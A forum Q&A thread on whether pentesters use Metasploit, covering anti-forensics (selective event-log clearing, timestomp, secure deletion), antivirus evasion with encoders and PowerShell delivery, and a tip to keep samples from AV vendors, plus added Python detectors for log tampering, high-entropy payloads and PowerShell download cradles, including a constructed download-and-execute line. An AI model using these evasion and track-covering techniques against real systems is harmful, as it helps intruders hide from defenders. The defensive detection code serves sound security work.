
I've played around with metasploit simply as a hobby but am wondering if actual pentesters and/or hackers actually use metasploit to get into systems or do they write their own post exploitation modules or their own programs entirely?

Reason I ask is because metasploit does not seem to be able to selectively clear windows event logs and such, or perhaps I just couldn't find it.(the nearest I can find is clearev but that simply wipes out everything which isn't very sneaky) Besides, even if it is able to selectively clear the event logs there will be places like the prefetch queue in ring 0 where forensics will be able to find what I did from the system image...

Martin
shawn

  • Not only do pen testers use Metasploit, but in many cases it is the only thing they know how to do. –  Jun 11 '14 at 10:31
  • What's the point of wiping logs during a pentest? Unless you are doing a redteam assessment. – Lucas Kauffman Apr 14 '15 at 21:03

6 Answers


As far as forensics is concerned, Metasploit has payloads which are specifically designed to make the work of forensic analysis more difficult. For example, the most famous payload, which is selected by default with a lot of exploit modules, is the meterpreter payload. It runs completely in memory and doesn't touch the disk for any operations (unless specifically asked to by the user), which means there will be no evidence in the prefetch folder or any other place on the disk.

You don't have to clear all the event logs. You can selectively clear any event log you want through the meterpreter script event_manager.

Meterpreter has a tool called timestomp which can change the modification, access, creation, and execution time of any file on the hard disk to any arbitrary value. You can securely wipe out any file with the sdel (safe delete) module, which not only securely wipes the file contents but renames the file to a long random string before the deletion, which makes forensic recovery of not only the contents but also the file metadata very difficult.

Now to the second part of your question, the use of Metasploit by actual malicious attackers in real-world attacks. There have been reports that Metasploit was used in one of the attacks on the Iranian nuclear facility. The reason you don't see Metasploit more often is the open source nature of the product. Since the exploits and payloads are available to everyone, by default every security product such as antivirus, IDS/IPS etc. considers these files as malicious. The defense industry has gone to such an extent that even if one creates a completely benign file with Metasploit, it will be detected by almost all the AV solutions. Generate an empty payload like:

echo -n | msfencode -e generic/none -t exe > myn.exe

Upload it to VirusTotal and you will see that more than half of the AV solutions detect it as malicious. More details can be found on Matt Weeks' blog here.

With this behavior no attacker will risk using Metasploit for actual attacks due to the very high detection rate. The modules can be easily customized, and bypassing AV and other security controls through Metasploit is quite easy as well. However, at that point it is difficult to determine if the payload was written from scratch or a Metasploit module was modified. Therefore, it is difficult to say for sure how many attackers have used or continue to use Metasploit in their operations.

void_in
  • Next time recommend novirusthanks (click do not distribute box), otherwise the AV will get your malware samples and they will be detected within a few days. – k1308517 Apr 08 '16 at 09:06
  • The purpose was to let the readers know that almost all the AVs consider anything related to msf as malicious. Also myn.exe as above isn't the actual payload the user will be using during their campaign. It is just a dummy payload having nothing in it other than using the default decoder and exe template. – void_in Apr 08 '16 at 10:31
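The answer above describes clearing or editing event logs from the attacker's side; the following is the responder's side of the same subject. It is an added example, not code from the original post or from Metasploit. It runs over constructed records shaped like the fields exported from .evtx files (channel, EventRecordID, EventID, TimeCreated) and applies three checks against a suspect log export: explicit clear events (Windows itself writes Security 1102 and System 104 when a log is cleared), gaps in EventRecordID (the service assigns it sequentially per channel, so missing numbers are consistent with records removed one by one), and timestamps that go backwards as the record ID rises (a clock change or rewritten records).

```python
"""Signs of Windows event-log tampering in exported records.

Added example, not code from the original answer or from Metasploit.
Input records are constructed in-line with the shape of an .evtx export.
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample, not real log data. Record IDs 1003 and 1004 are
# absent on purpose and record 1006 carries a time earlier than 1005.
SAMPLE_RECORDS = [
    {"channel": "Security", "record_id": 1001, "event_id": 4624, "time": "2015-04-10T04:00:00"},
    {"channel": "Security", "record_id": 1002, "event_id": 4688, "time": "2015-04-10T04:00:05"},
    {"channel": "Security", "record_id": 1005, "event_id": 4624, "time": "2015-04-10T04:01:00"},
    {"channel": "Security", "record_id": 1006, "event_id": 4688, "time": "2015-04-10T04:00:30"},
    {"channel": "System",   "record_id": 500,  "event_id": 7036, "time": "2015-04-10T04:02:00"},
    {"channel": "System",   "record_id": 501,  "event_id": 104,  "time": "2015-04-10T04:03:00"},
    {"channel": "Security", "record_id": 1007, "event_id": 1102, "time": "2015-04-10T04:03:01"},
]

# (channel, event id) pairs that Windows writes when that log is cleared
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}


def find_tampering(records):
    """Return findings as (channel, kind, detail) tuples, in record order per channel."""
    findings = []
    by_channel = defaultdict(list)
    for rec in records:
        by_channel[rec["channel"]].append(rec)

    for channel, recs in by_channel.items():
        recs = sorted(recs, key=lambda r: r["record_id"])
        prev_id = prev_time = None
        for rec in recs:
            rid = rec["record_id"]
            # 1. the OS's own "log cleared" audit record
            if (channel, rec["event_id"]) in CLEAR_EVENTS:
                findings.append((channel, "log_cleared",
                                 f"record {rid} is event {rec['event_id']}"))
            # 2. record IDs are sequential per channel; a hole means records are gone
            if prev_id is not None and rid != prev_id + 1:
                findings.append((channel, "record_gap",
                                 f"{rid - prev_id - 1} record(s) missing between {prev_id} and {rid}"))
            # 3. time should not move backwards as the record ID rises
            t = datetime.fromisoformat(rec["time"])
            if prev_time is not None and t < prev_time:
                findings.append((channel, "time_regression",
                                 f"record {rid} is timestamped before record {prev_id}"))
            prev_id, prev_time = rid, t
    return findings


def summarize(findings):
    """Count findings per kind, e.g. {'record_gap': 1, 'log_cleared': 2}."""
    counts = defaultdict(int)
    for _, kind, _ in findings:
        counts[kind] += 1
    return dict(counts)


if __name__ == "__main__":
    for channel, kind, detail in find_tampering(SAMPLE_RECORDS):
        print(f"{channel:9} {kind:16} {detail}")
```

On the constructed sample this reports one record gap and one time regression in the Security log plus the two clear events. A gap check is only meaningful on a contiguous export; if the log was rotated or the collector dropped records, the responder needs to rule that out before reading a hole as deletion.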

I don't know about malicious attackers/hackers, but I do know several pentesters (myself included) who include Metasploit in their toolboxes. It's by far not the only tool used, but it certainly has its uses. That being said, your question seems to be about "covering your tracks", which is naturally something more useful to the malicious attacker. On my pentest engagements, we rarely tamper with logs, except when detecting log tampering is one of the "blue team" goals. (Then we do it to see if it gets detected.)

David

Yes, pentesters do use Metasploit. With custom exe templates and shikata_ga_nai, you are able to fool nearly every AV solution (Google for AV evasion to learn more about this), and the meterpreter payload is really handy to escalate privileges in Windows domains.

That being said, Metasploit is only one tool of many and a good pentester should know and use the right tool for the right task.

Clearing specific entries out of the event log might come in handy for a pentest when the goal is to be undetected and fool SIEM systems. However, just because this feature is missing from Metasploit (as of now) does not mean that you cannot use all the useful modules that are already there.

Regarding custom toolkits, I would imagine that it would be more effective to fork Metasploit or to simply write your own post-exploitation modules (like selective event log deletion).

That's the beauty of open source software.

forest
Sebastian B.
  • Small additional note: shikata_ga_nai (or any other encoder) should not be used in order to avoid AV software. It works often, but encoders are primarily meant to avoid bad chars etc. Metasploit Pro has a true anti-virus evasion technique implemented that generates a truly random program. – Stolas Jun 11 '14 at 08:47
  • I don't see the point why I should not use shikata_ga_nai to avoid AV software? If I don't need Metasploit Pro and don't want to buck up for it, why shouldn't I just use shikata_ga_nai for it? Do you have any specific reasons why it would be bad to do this? – Sebastian B. Sep 19 '14 at 14:04
  • Well, it might be detected by heuristics you didn't prepare for. Creating 'unreadable' code will only fool stupid (granted, most AV is stupid) security products. But most of them will detect that something might be 'off' with the file. If you encode it, the entropy will heighten. This will result in a 'caught' '0day' 'virus'. However, if you make a better random program that also triggers the same conditions as your meterpreter, the chance of being detected is way lower, as it looks and acts as a normal program. – Stolas Sep 19 '14 at 18:24
  • shikata_ga_nai has been detectable by AV for a long time. It would be easier to write your own encoder, which would be harder to detect. The Pro version may have a superior encoder, but that's a lot of money for something you can do yourself. It's nice though if your job pays for it for you, since then you'll have more time to spend on the actual pentesting. – forest Jan 24 '18 at 13:39
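The comment thread above turns on one heuristic: encoding a payload raises the byte entropy of the region that carries it, and scanners flag that. The block below, an added example and not code from the page, from Metasploit or from any AV product, is the check an analyst or a simple file scanner would run: sliding-window Shannon entropy over a buffer, with windows above a threshold reported. Window size, step and the 7.2-bit threshold are assumptions for the demonstration; the two sample buffers are constructed in-line, one standing in for ordinary program text and one with a flat byte histogram standing in for an encoded blob.

```python
"""Sliding-window byte entropy as a heuristic for encoded payload sections.

Added example, not code from the original page. Thresholds and window
parameters are assumptions; the sample buffers are constructed.
"""
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a flat histogram."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data, window=256, step=128, threshold=7.2):
    """(offset, entropy) for every window whose entropy exceeds the threshold."""
    hits = []
    last_start = max(len(data) - window, 0)
    for off in range(0, last_start + 1, step):
        e = shannon_entropy(data[off:off + window])
        if e > threshold:
            hits.append((off, round(e, 2)))
    return hits


def scan(data, **kw):
    """Summary a scanner could score on: window count, flagged count, fraction flagged."""
    window = kw.get("window", 256)
    step = kw.get("step", 128)
    total = len(range(0, max(len(data) - window, 0) + 1, step))
    flagged = high_entropy_windows(data, **kw)
    return {"windows": total, "flagged": len(flagged),
            "fraction": round(len(flagged) / total, 3) if total else 0.0}


# Constructed samples. PLAIN_TEXT stands in for ordinary code and strings,
# whose byte histogram is skewed. FLAT_HISTOGRAM visits all 256 byte values
# in a scrambled order (167 is coprime to 256), so every 256-byte window has
# maximal entropy, the profile an encoded or packed section shows.
PLAIN_TEXT = b"Ordinary program text and strings have a skewed byte distribution. " * 40
FLAT_HISTOGRAM = bytes((i * 167 + 11) % 256 for i in range(2048))

if __name__ == "__main__":
    for name, buf in (("plain text", PLAIN_TEXT), ("flat histogram", FLAT_HISTOGRAM)):
        print(name, scan(buf))
```

The fraction of flagged windows is what separates a file that merely embeds a compressed resource from one whose executable sections are uniformly scrambled; a real scanner would apply the check per PE section and combine it with the other signals mentioned above rather than treat entropy alone as a verdict.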

There are advantages to using Immunity Security or CoreSec products over Rapid7 (whether the commercial Metasploit offerings or the FOSS MetaSploit Framework aka MSF). You'll have to test them out for yourself, but it mostly has to do with being able to run canned exploits and organize plans/results. As far as I understand it, all MSF exploits can be run from Core IMPACT. Metasploit isn't going anywhere anytime soon, though, and can be used along with any other tools. Let me see if I can address some of its weaknesses first.

In terms of the payload, MSF's capabilities including meterpreter leave a lot to be desired. Most MSF payloads are easy to spot by AV and HIPS of many kinds. The default payload executable implements many common Windowsisms that I dislike it using, such as standard W32 library calls and dependencies. INNUENDO (and the earlier MOSDEF) from ImmSec is better, but MOSDEF has also seen a few fingerprints recently. App whitelisting is another concern for any implant-backdoor technology, but here is a bypass that leverages parts of MSF. Here is another that leverages Powershell. Many professionals avoid the default executable and use the generate -t flag (or via msfvenom) to drop psh (Powershell), dll (for AppInit registry injection), or another uncommon format.

While MSF is partially embedded in Cobalt Strike's Beacon, the capabilities go way beyond what Meterpreter can do alone. Highly recommended!

Also, I've heard of others using tools such as Throwback for its simplicity. It's good to have alternatives. Another one I found is ClickOnce.

MSF itself even appears to be going a new route when attacking modern Windows (Win7 and higher, Win Server 2k8r2 or higher) through Powershell with web_delivery. An attacker can build on this framework to inject a lot more Powershell action for post-exploitation tasks, such as:

The MSF module, web_delivery, can also deliver a Python or PHP payload and may possibly be modified to support other interpreters such as Ruby. If you want to put it all together for a deeper understanding of "why Powershell over MSF", see this blog post -- http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html

An extra worry for Powershell is when running up against Device Guard in Windows 10.

[UPDATE] According to one of the comments below, Metasploit Pro can utilize stronger payloads which are also being integrated into the open-source version of MSF. If you have Metasploit Pro, check the auxiliary/pro module improvements, such as generate_dynamic_stager. If not, read about the stageless meterpreter payloads.

Tools that use TCP (along with DNS) can be proxied through Meterpreter easily by using the msfconsole route command, proxychains, and the socks4a server module. After a session is created, set up a route to its network (or even localhost, as seen in the first link in this paragraph) through its session id. Then, run the socks4a module and pass its configuration to the proxychains.conf file. Even DNS should pass through appropriately. There is likely more than one way to run external tools through Metasploit. Like Ruby (and Perl before it), Metasploit is a framework where "there's more than one way to do it". It is up to you, as a developer, to integrate your ideas. Using the power of open-source software, contribute your changes and join in on the community.

atdre
  • Meterpreter is better as an interactive payload. In the case of non-interactive use (e.g. campaigns over an extended period of time), it is not very reliable. However, auto connect back and dealing with network error issues is a priority and you should see marked improvements in the coming weeks. Stageless meterpreter is integrated in the main tree as well. And yes, Throwback is awesome. – void_in Apr 10 '15 at 04:28
  • Powershell is now on Crowdstrike's radar. Won't be long until ClickOnce and newer payload concepts will have their heyday – atdre Apr 24 '15 at 04:05
  • How effective are they going to be in the download-at-runtime-in-memory-and-execute model? I have seen these HIPS solutions are better than AV regarding in-memory execution, but they still leave a lot to be desired. Payloads are getting smaller with generic functionalities, e.g. throwback, where the actions it performs are not malicious from the HIPS point of view. So I think we are going to see (and as a pentester I am getting a lot of success with these) generic payloads which give the user a gateway to the machine without trying to do too much. Then functionality can be added on demand – void_in Apr 24 '15 at 04:26
  • There are also these -- https://github.com/SherifEldeeb?tab=repositories -- third-party meterpreter payloads: ultimet (inmet) and tinymet. Very useful! Thoughts? – atdre Aug 28 '15 at 17:37
  • Yes. Back in the days when ultimet and inmet came out, I tested them, but now the built-in stageless meterpreter is better since it provides connection resiliency features (as I mentioned in the first comment). Also, since you can generate stageless meterpreter in raw format from within Metasploit through msfvenom, you can perform all sorts of actions such as manually editing assembly or encrypting the payload through Veil – void_in Aug 30 '15 at 17:20
  • I may contend that, as of late, Empire's Process Injection -- http://www.powershellempire.com/?page_id=273 -- especially when combined with PowerSploit's Invoke-ReflectivePEInjection and Out-MiniDump provide a lot of advantage (as an implant) over anything in meterpreter, unicorn, or even spraywmi – atdre Nov 13 '15 at 10:50
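The answer and its comments describe the move to PowerShell delivery (web_delivery, download-and-execute in memory, reflective injection) from the operator's side. Added here, and not code from the page, Metasploit, Empire or PowerSploit, is the triage a SIEM rule or responder applies to the telemetry those techniques leave: process-creation command lines and PowerShell script-block text. The point the block makes beyond plain keyword matching is that an -EncodedCommand argument is base64 of UTF-16LE text, so the scan decodes it before matching; a filter that only looks at the raw command line sees nothing. The indicator list, weights, threshold and the handled forms of the -EncodedCommand switch are assumptions; the records and the URL in them are constructed placeholders.

```python
"""Triage of PowerShell command lines and script blocks for download-and-
execute, encoded-command and reflective-injection patterns.

Added example, not code from the original page or any named tool. The
indicator weights are assumptions; sample records are constructed.
"""
import base64
import re

# (name, pattern, weight): assumed scoring, tune to the environment
INDICATORS = [
    ("invoke_expression",    r"\b(?:iex|invoke-expression)\b", 3),
    ("download_cradle",      r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", 3),
    ("base64_decode",        r"frombase64string", 2),
    ("hidden_window",        r"-w(?:indowstyle)?\s+hidden", 1),
    ("no_profile",           r"-nop(?:rofile)?\b", 1),
    ("reflective_injection", r"invoke-reflectivepeinjection|virtualalloc", 3),
]
COMPILED = [(name, re.compile(pat, re.I), weight) for name, pat, weight in INDICATORS]

# -e, -en, -enc and -encodedcommand are handled here (assumption: PowerShell
# accepts any unambiguous prefix, so extend the alternation if needed)
ENCODED_ARG = re.compile(r"-e(?:n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand text, or None if absent or undecodable."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_record(record):
    """Score one record over its visible text plus any decoded payload."""
    command_line = record.get("command_line", "")
    texts = [command_line, record.get("script_block", "")]
    decoded = decode_encoded_command(command_line)
    if decoded is not None:
        texts.append(decoded)          # match on what would actually execute
    matched, score = [], 0
    for name, rx, weight in COMPILED:
        if any(rx.search(t) for t in texts):
            matched.append(name)
            score += weight
    if decoded is not None:
        matched.append("encoded_command")
        score += 2
    return {"score": score, "indicators": matched, "decoded": decoded}


def triage(records, threshold=5):
    """Return (index, score, indicators) for records scoring at or above threshold."""
    out = []
    for i, rec in enumerate(records):
        result = score_record(rec)
        if result["score"] >= threshold:
            out.append((i, result["score"], result["indicators"]))
    return out


# Constructed sample records (not real telemetry). The encoded command is
# built here from plain text so the example stays self-contained; the URL
# is a placeholder.
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
CRADLE_ENCODED = base64.b64encode(CRADLE_TEXT.encode("utf-16-le")).decode("ascii")
SAMPLE_RECORDS = [
    {"event_id": 4688, "command_line": f"powershell.exe -nop -w hidden -enc {CRADLE_ENCODED}"},
    {"event_id": 4688, "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"event_id": 4104, "script_block": "Get-ChildItem C:\\Users | Where-Object { $_.Name -eq 'Public' }"},
    {"event_id": 4104, "script_block": "Invoke-ReflectivePEInjection -PEBytes $bytes"},
]

if __name__ == "__main__":
    for idx, score, hits in triage(SAMPLE_RECORDS, threshold=0):
        print(idx, score, hits)
```

Only the first record crosses the default threshold; the scheduled backup script and the directory listing score zero, and the injection script block registers a single indicator, which is where script-block logging (Event 4104) earns its keep, since nothing in that record's process command line would have matched.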

Yes, Metasploit is very commonly used by industry professionals.

See for example this link.

lorenzog
Fairlight

Yes, I do use Metasploit to exploit known vulnerabilities which have an exploit written in Metasploit. In my case, we exploited using Metasploit just to prove the risk of the vulnerability and show the risk to the client. So basically, the client knows when we want to exploit this vulnerability.

zakiakhmad